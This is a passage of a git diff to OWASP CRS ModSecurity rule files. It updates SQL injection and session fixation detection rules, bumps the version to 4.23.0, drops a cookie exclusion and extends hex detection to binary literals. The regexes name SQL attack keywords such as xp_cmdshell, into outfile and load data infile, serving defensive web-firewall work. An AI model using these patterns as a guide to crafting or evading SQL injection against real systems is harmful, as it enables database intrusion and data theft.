" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:a(?:(?:b|co)s|vg)|bin|c(?:(?:as|o(?:nver|un))t|h(?:ar(?:set)?|r))|d(?:a(?:te|y)|e(?:fault|grees))|elt|f(?:ield|loor|ormat)|(?:hou|quarte|yea)r|i[fns]|l(?:ast|e(?:ft|ngth)|n|ikelihood|o(?:cal|g|wer))|m(?:ax|in(?:ute)?|o(?:d|nth))|now|p(?:assword|i|o(?:sition|wer))|r(?:awtonhex(?:toraw)?|e(?:p(?:eat|lace)|verse)|ight|ound)|s(?:econd|ign|leep|pace|tddev|um)|t(?:an|ime|o_(?:n?char|(?:day|second)s))|u(?:nlikely|(?:pp|s)er)|v(?:alues|ersion)|week)[^0-9A-Z_a-z]*?\(" \ "id:942410,\ phase:2,\ block,\ @@ -1213,7 +1213,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1226,7 +1226,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942470 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)autonomous_transaction|(?:current_use|n?varcha|tbcreato)r|db(?:a_users|ms_java)|open(?:owa_util|query|rowset)|s(?:p_(?:(?:addextendedpro|sqlexe)c|execute(?:sql)?|help|is_srvrolemember|makewebtask|oacreate|p(?:assword|repare)|replwritetovarbin)|ql_(?:longvarchar|variant))|utl_(?:file|http)|xp_(?:availablemedia|(?:cmdshel|servicecontro)l|dirtree|e(?:numdsn|xecresultset)|filelist|loginconfig|makecab|ntsec(?:_enumdomains)?|reg(?:addmultistring|delete(?:key|value)|enum(?:key|value)s|re(?:ad|movemultistring)|write)|terminate(?:_process)?)" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)autonomous_transaction|(?:current_use|n?varcha|tbcreato)r|db(?:a_users|ms_java)|open(?:owa_util|query|rowset)|s(?:p_(?:(?:addextendedpro|sqlexe)c|execute(?:sql)?|help|is_srvrolemember|makewebtask|oacreate|p(?:assword|repare)|replwritetovarbin)|ql_(?:longvarchar|variant))|utl_(?:file|http)|xp_(?:availablemedia|(?:cmdshel|servicecontro)l|dirtree|e(?:numdsn|xecresultset)|filelist|loginconfig|makecab|ntsec(?:_enumdomains)?|reg(?:addmultistring|delete(?:key|value)|enum(?:key|value)s|re(?:ad|movemultistring)|write)|terminate(?:_process)?)" \ "id:942470,\ phase:2,\ block,\ @@ -1242,7 +1242,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1255,7 +1255,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 942480 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:(?:d(?:bms_[0-9A-Z_a-z]+\.|elete\b[^0-9A-Z_a-z]*?\bfrom)|(?:group\b.*?\bby\b.{1,100}?\bhav|overlay\b[^0-9A-Z_a-z]*?\(.*?\b[^0-9A-Z_a-z]*?plac)ing|in(?:ner\b[^0-9A-Z_a-z]*?\bjoin|sert\b[^0-9A-Z_a-z]*?\binto|to\b[^0-9A-Z_a-z]*?\b(?:dump|out)file)|load\b[^0-9A-Z_a-z]*?\bdata\b.*?\binfile|s(?:elect\b.{1,100}?\b(?:(?:.*?\bdump\b.*|(?:count|length)\b.{1,100}?)\bfrom|(?:data_typ|from\b.{1,100}?\bwher)e|instr|to(?:_(?:cha|numbe)r|p\b.{1,100}?\bfrom))|ys_context)|u(?:nion\b.{1,100}?\bselect|tl_inaddr))\b|print\b[^0-9A-Z_a-z]*?@@)|(?:collation[^0-9A-Z_a-z]*?\(a|@@version|;[^0-9A-Z_a-z]*?\b(?:drop|shutdown))\b|'(?:dbo|msdasql|s(?:a|qloledb))'" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:(?:d(?:bms_[0-9A-Z_a-z]+\.|elete\b[^0-9A-Z_a-z]*?\bfrom)|(?:group\b.*?\bby\b.{1,100}?\bhav|overlay\b[^0-9A-Z_a-z]*?\(.*?\b[^0-9A-Z_a-z]*?plac)ing|in(?:ner\b[^0-9A-Z_a-z]*?\bjoin|sert\b[^0-9A-Z_a-z]*?\binto|to\b[^0-9A-Z_a-z]*?\b(?:dump|out)file)|load\b[^0-9A-Z_a-z]*?\bdata\b.*?\binfile|s(?:elect\b.{1,100}?\b(?:(?:.*?\bdump\b.*|(?:count|length)\b.{1,100}?)\bfrom|(?:data_typ|from\b.{1,100}?\bwher)e|instr|to(?:_(?:cha|numbe)r|p\b.{1,100}?\bfrom))|ys_context)|u(?:nion\b.{1,100}?\bselect|tl_inaddr))\b|print\b[^0-9A-Z_a-z]*?@@)|(?:collation[^0-9A-Z_a-z]*?\(a|@@version|;[^0-9A-Z_a-z]*?\b(?:drop|shutdown))\b|'(?:dbo|msdasql|s(?:a|qloledb))'" \ "id:942480,\ phase:2,\ block,\ @@ -1271,7 +1271,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|REQUEST tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1312,7 +1312,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1355,7 +1355,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ # crs-toolchain regex update 942440 # crs-toolchain regex update 942440-chain1 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx /\*!?|\*/|[';]--|--(?:[\s\x0b]|[^\-]*?-)|[^&\-]#.*?[\s\x0b]|;?\x00" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx /\*!?|\*/|[';]--|--(?:[\s\x0b]|[^\-]*?-)|[^&\-]#.*?[\s\x0b]|;?\x00" \ "id:942440,\ phase:2,\ block,\ @@ -1371,7 +1371,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "!@rx ^(?:ey[\-0-9A-Z_a-z]+\.ey[\-0-9A-Z_a-z]+\.)?[\-0-9A-Z_a-z]+$" \ @@ -1381,18 +1381,18 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # -# -=[ SQL Hex Evasion Methods ]=- +# -=[ SQL Bin / Hex Evasion Methods ]=- # # Hex encoding detection: # (?i:\b0x[a-f\d]{3,}) will match any 3 or more hex bytes after "0x", together forming a hexadecimal payload(e.g 0xf00, 0xf00d and so on) # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\b0x[a-f\d]{3,})" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\b0x[a-f\d]{3,}|x\'[a-f\d]{3,}\'|b\'[0-1]{10,}\')" \ "id:942450,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,\ - msg:'SQL Hex Encoding Identified',\ + msg:'SQL Bin or Hex Encoding Identified',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ @@ -1402,7 +1402,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1449,7 +1449,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:`(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1476,7 +1476,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1509,7 +1509,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.942521_matched_var_name=%{matched_var_name}',\ chain" @@ -1537,7 +1537,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ^.*?\x5c['\"`](?:.*?['\"`])?\s*(?:and|or)\b" tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1575,7 +1575,7 @@ SecRule REQUEST_BASENAME|REQUEST_FILENAME "@detectSQLi" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1607,7 +1607,7 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)\b(?:a(?:dd( tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1637,15 +1637,15 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)create[\s\x0 tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # @@ -1677,7 +1677,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\W tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1701,7 +1701,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\"'`] tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1725,7 +1725,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\"'`] # SecRuleUpdateTargetById 942420 "!REQUEST_COOKIES:foo_id" # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){8})" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){8})" \ "id:942420,\ phase:1,\ block,\ @@ -1741,7 +1741,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx (( tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1770,7 +1770,7 @@ SecRule ARGS_NAMES|!ARGS_NAMES:/^[\w]+\[[\w\-]+\]\[[\w\-]*?\]$/|!ARGS_NAMES:/^[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1812,7 +1812,7 @@ SecRule ARGS "@rx \W{4}" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}'" @@ -1860,7 +1860,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:'(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1889,14 +1889,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ';" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # @@ -1907,7 +1907,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'O # This is a stricter sibling of rule 942420. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){3})" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>][^~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´’‘`<>]*?){3})" \ "id:942421,\ phase:1,\ block,\ @@ -1923,7 +1923,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES "@rx (( tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" @@ -1952,7 +1952,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\ setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'" diff --git a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf index e74dbf5186..2fa8a5bfef 100644 --- a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf +++ b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -44,7 +44,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:\. tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SESSION-FIXATION',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -66,7 +66,7 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SESSION-FIXATION',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.943110_matched_var_name=%{matched_var_name}',\ chain" @@ -94,7 +94,7 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SESSION-FIXATION',\ tag:'capec/1000/225/21/593/61',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.943120_matched_var_name=%{matched_var_name}',\ chain" @@ -105,24 +105,24 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf index d3e8a6779a..3820e4f83c 100644 --- a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf +++ b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ 